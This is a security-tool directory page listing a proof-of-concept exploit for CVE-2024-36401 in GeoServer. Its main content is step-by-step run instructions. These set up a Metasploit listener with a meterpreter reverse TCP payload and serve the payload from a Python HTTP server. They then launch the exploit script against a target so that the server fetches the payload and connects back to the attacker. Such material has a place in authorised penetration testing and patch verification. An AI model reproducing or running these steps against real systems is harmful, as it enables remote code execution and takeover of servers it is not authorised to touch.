Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-36401-PoC — Proof-of-Concept Exploit for CVE-2024-36401 GeoServer 2.25.1 | Kitploit
Tools/GitHubGitHub/daniellowrie/cve-2024-36401-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubdaniellowrie/cve-2024-36401-poc

CVE-2024-36401-PoC

Proof-of-Concept Exploit for CVE-2024-36401 GeoServer 2.25.1

View Repository
331 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-36401-PoC

Proof-of-Concept Exploit for CVE-2024-36401 GeoServer
Vulnerable Versions of GeoServer are prior to 2.23.6 | 2.24.4 | 2.25.2

!!! FOR SECURITY TESTING PURPOSES ONLY !!!
******************************************************
DO NOT USE THIS ON SYSTEMS THAT YOU DO NOT
OWN UNLESS YOU HAVE EXPRESS PERMISSION !!!

To run...

  1. Start a listener in Metasploit
    • root@kitploit:~
      msf6 > use exploit/multi/handler
      msf6 > exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
      msf6 > exploit(multi/handler) > set LHOST 10.10.10.1 <--(set to your IP)
      msf6 > exploit(multi/handler) > set LPORT 1234 <--(you can leave default, or change to your preference)
      msf6 > exploit(multi/handler) > run
      
      [*] Started reverse TCP handler on 10.10.10.1:1234
      
      
  2. Start HTTP server with Python
    • root@kitploit:~
      hacker@kali~> python3 -m http.server
      Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
      
  3. Run exploit
    • root@kitploit:~
      hacker@kali~> python3 ./geopwn.py <target_domain_or_IP> <payload_URL> <LHOST> <LPORT>
      
Download Tool